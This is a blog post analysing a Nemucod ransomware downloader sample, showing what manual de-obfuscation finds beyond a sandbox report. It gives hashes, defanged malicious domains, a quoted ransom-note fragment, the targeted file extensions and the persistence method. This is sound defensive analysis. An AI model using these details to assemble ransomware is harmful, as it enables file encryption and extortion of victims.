Sandbox and Malware

calendar Mar 22, 2023 · 3 min read · Malware Archive Analysis  ·
Share on: linkedin copy

Do not get me wrong sandboxes are a very useful tool when it comes to looking at potentially malicious artefacts. Primarily as they offer a quick analysis of samples to give responders a better understanding of the sample with a low risk to the organisation.

They are not however a complete assessment of the artefact as they only report what was seen such as the domain accessed, file changes etc.

Take this public sample :

https://malwr.com/analysis/MTM4MjVkOWM2MDlhNGFjMWJkNDM1MjY1NDllYTFlZWY/

FILE NAME 000239544.doc.js FILE SIZE 23074 bytes FILE TYPE ASCII text, with very long lines, with no line terminators MD5 2019aac5b5d8a0fbacae8c8a243d9879 SHA1 634cf6cfe44a2fd6334c1acba6850305bdf573f6 SHA256 6c8b19b272669a727c80b4b034da85a72f09aabc8e08de43da8c74c5229b3b7c

The analysis highlights that the sample performs some HTTP GET requests to

www[.]congress-hotel-hannover[.]de/ as well as traffic to the IP 62[.]210[.]131[.]107

The was no indication of what the traffic was. These indicators of compromise would often be blocked on perimeter controls such as firewalls to prevent the sample from communicating or detonating but there is no indicators of what you are actually dealing with.

However by analysing the script code (available in the Static Analysis/Strings section of the sample URL) there are additional indicators that may have been missed:

  • profwebexpert[.]com
  • topikriau[.]com
  • umusomyi[.]com
  • 1hrdesigns[.]com

The first part of the script is based around constructing the URL and retrieving data which is then written as a .exe. The rest of the script reveal useful indicators of what the sample is designed to do.

fp.WriteLine("ATTENTION!"); fp.WriteLine(""); fp.WriteLine("All your documents, photos, databases and other important personal files"); fp.WriteLine("were encrypted using strong RSA-1024 algorithm with a unique key."); fp.WriteLine("To restore your files you have to pay "+bc+" BTC (bitcoins)."

The script appear to search for the following file types:

.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk

and passes them to the downloaded executable to encrypt and maintains persistence by creating an entry in the Run section of the registry. It appears that any identified file has ".crypted" added.

This indicates this is a type of ransomware the rest of the script creates the ransom note and instructions of how to pay.

Searching for .crypted indicates this is the Nemucod Trojan's .CRYPTED Ransomware. If nothing was encrypted you may think all is well. Further research of Nemucod Trojan downloader also highlights that ransomware is just one component and it is capable of downloading additional malware which as a responder will need to be looked into for other indicators present on the endpoint.

Although sandboxes have there uses and running multiple sandboxes is an advantage there has to be a balance between relying on automated tools and looking into samples in more detail.

Often this always comes down to time and skills available. The above was de-obfuscated using JSDetox and the rest was reading through the code.